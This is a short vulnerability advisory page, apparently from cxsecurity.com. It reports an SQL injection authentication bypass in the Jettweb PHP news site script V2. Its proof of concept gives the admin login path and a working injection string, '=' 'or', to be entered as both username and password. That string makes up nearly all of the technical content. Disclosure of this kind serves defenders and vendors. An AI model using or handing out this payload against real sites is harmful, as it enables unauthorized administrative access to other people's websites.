Jettweb PHP Hazir Haber Sitesi Scripti 2 SQL Injection

2019.03.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V2 - Authentication Bypass # Date: 25.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html # Demo Site: http://haberv2.proemlaksitesi.net # Version: V2 # Tested on: Kali Linux # CVE: N/A ----- PoC: Authentication Bypass ----- Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php Username: '=' 'or' Password: '=' 'or'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top